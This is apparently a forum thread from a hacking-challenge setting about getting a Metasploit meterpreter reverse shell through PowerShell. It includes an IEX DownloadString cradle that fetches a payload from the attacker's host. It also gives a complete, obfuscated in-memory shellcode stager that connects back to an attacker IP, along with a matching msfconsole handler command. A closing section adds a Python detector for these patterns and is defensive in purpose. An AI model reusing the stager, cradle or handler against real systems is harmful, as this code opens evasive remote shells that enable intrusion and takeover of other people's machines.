How to use meterpreter/reverse_tcp with PowerShell?

I’m new and having some issues using the meterpreter/reverse_tcp payload with PS.

Note: this may be kind of dumb since I already have shell access on the victim machine, but I still want to understand what I’m doing wrong.

Context

I have shell/PS user-level access on a 64-bit Windows machine (one of the machine challenges). I want to start a meterpreter shell.

What I’m Doing

I generate a payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip_from_tun0> LPORT=9001 VERBOSE=true -f ps1 -o meterpreter.ps1

I then execute it from the remote shell (running a local webserver to host):

powershell IEX(New-Object Net.WebClient).downloadString('http://<ip_from_tun0>/meterpreter.ps1')

However, nothing happens: I just get the shell prompt back on the victim machine and no activity on my msf handler. Watching for any connections to my host with nc -lvnp 9001 also doesn’t show any connection being made.

I verified the victim can ping the host, that the content is downloaded correctly, etc. My expectation is that when the msfvenom payload is executed, it will try to connect to the handler on the given host… Is there something I’m doing wrong or am I misunderstanding how to use msfvenom?

Use unicorn (GitHub - trustedsec/unicorn): Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
It is specifically created for this purpose.

First you have to start a web server on your Kali with <python -m SimpleHTTPServer 80> in order to be able to download it through the shell you already have. The “powershell IEX(New-Object Net.WebClient).downloadString(‘http://<ip_from_tun0>/meterpreter.ps1’)” command just downloads the file from the web server you host, it doesn't execute it. You will then have to execute the file after you download it with . Hope this helps

To use staged payloads and encryption, use the 32-bit version of PowerShell:

%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe

Use the following code, replacing IP and PORT:

$ip = "YourIP"; $port = YourPORT; $c = @"
[D#ll#Imp#ort("ker#ne#l32.#dll")] publi#c static e#xtern In#tPtr Virt#ualAl#loc(Int#Ptr w, ui#nt x, ui#nt y, ui#nt z);
[Dl#lI##mpor#t("kern#el32.d#ll")] pub#lic st#atic ex#tern Int#Ptr Cr#eate#Thr#ead(Int#Ptr u, u#int v, IntP#tr w, Int#Ptr x, ui#nt y, IntPtr z);
"@.replace("#", "")
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect($ip, $port) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400;  Start-Sleep -Second 86400; Start-Sleep -Second 86400; Start-Sleep -Second 86400}catch{}

Then set up your listener:
msfconsole -x "set lhost YourIP; set lport YourPORT; use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set EnableStageEncoding true; set StageEncoder x86/xor_dynamic; run"

Enjoy!
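From the defender's side, the three things this thread shows (an IEX/DownloadString cradle, an inline DllImport of VirtualAlloc/CreateThread hidden by '#'-splitting a here-string, and a launch of the 32-bit PowerShell under syswow64) are all visible in PowerShell script block logging (Event ID 4104). The following is an added example, not code from the thread or from Metasploit or unicorn: a small Python scanner that first undoes the `.replace("#", "")` obfuscation, then matches the indicators. The sample script-block texts are constructed for this example and the indicator names are my own.

```python
"""Flag PowerShell script-block text carrying the patterns seen in the thread.

Input is assumed to be the script text recorded by PowerShell script block
logging (Event ID 4104); the SAMPLES below are constructed, not real captures.
"""
import re

# Constructed sample script-block texts, one per pattern plus a benign control.
SAMPLES = {
    "cradle": "powershell IEX(New-Object Net.WebClient)"
              ".downloadString('http://<ip_from_tun0>/meterpreter.ps1')",
    "stager": '$c = @"\n'
              '[D#ll#Imp#ort("ker#ne#l32.#dll")] publi#c static e#xtern In#tPtr '
              'Virt#ualAl#loc(Int#Ptr w, ui#nt x, ui#nt y, ui#nt z);\n'
              '[Dl#lI##mpor#t("kern#el32.d#ll")] pub#lic st#atic ex#tern Int#Ptr '
              'Cr#eate#Thr#ead(Int#Ptr u, u#int v, IntP#tr w, Int#Ptr x, ui#nt y, IntPtr z);\n'
              '"@.replace("#", "")\n'
              '$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru',
    "wow64": r"%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe",
    "benign": 'Get-ChildItem C:\\Users | Where-Object { $_.Name -like "a*" }',
}

# Matches the junk-character trick used in the thread: .replace("<one char>", "")
STRIP_CHAR_RE = re.compile(r'\.replace\(\s*"(.)"\s*,\s*""\s*\)', re.IGNORECASE)

# Every pattern in a list must match (after normalisation) for the indicator to fire.
INDICATORS = {
    "download_cradle": [r"(?:iex|invoke-expression)", r"downloadstring\("],
    "inline_native_injection": [r"dllimport", r"virtualalloc", r"createthread"],
    "wow64_powershell": [r"syswow64\\windowspowershell\\v1\.0\\powershell\.exe"],
}


def normalize(text: str) -> str:
    """Undo the simple junk-character obfuscation before matching.

    If the block strips a character out of a string with .replace("x", ""),
    strip that character from the whole block ourselves, so that
    [D#ll#Imp#ort(...)] reads as [DllImport(...)]. Then lowercase for matching.
    """
    norm = text
    for junk in set(STRIP_CHAR_RE.findall(text)):
        norm = norm.replace(junk, "")
    return norm.lower()


def scan(text: str) -> list:
    """Return the sorted names of all indicators that fire on one script block."""
    norm = normalize(text)
    return sorted(
        name for name, patterns in INDICATORS.items()
        if all(re.search(p, norm) for p in patterns)
    )


def scan_all(blocks: dict) -> dict:
    """Scan a mapping of label -> script-block text; keep only the hits."""
    return {label: hits for label, text in blocks.items() if (hits := scan(text))}


if __name__ == "__main__":
    for label, hits in scan_all(SAMPLES).items():
        print(f"{label}: {', '.join(hits)}")
```

The normalisation step is the part worth keeping: matching `VirtualAlloc` literally misses the here-string above, but any block that both splits a name with a filler character and calls `.replace` to remove it has to carry the filler character in plain sight, so the scanner removes the same character before looking for the API names.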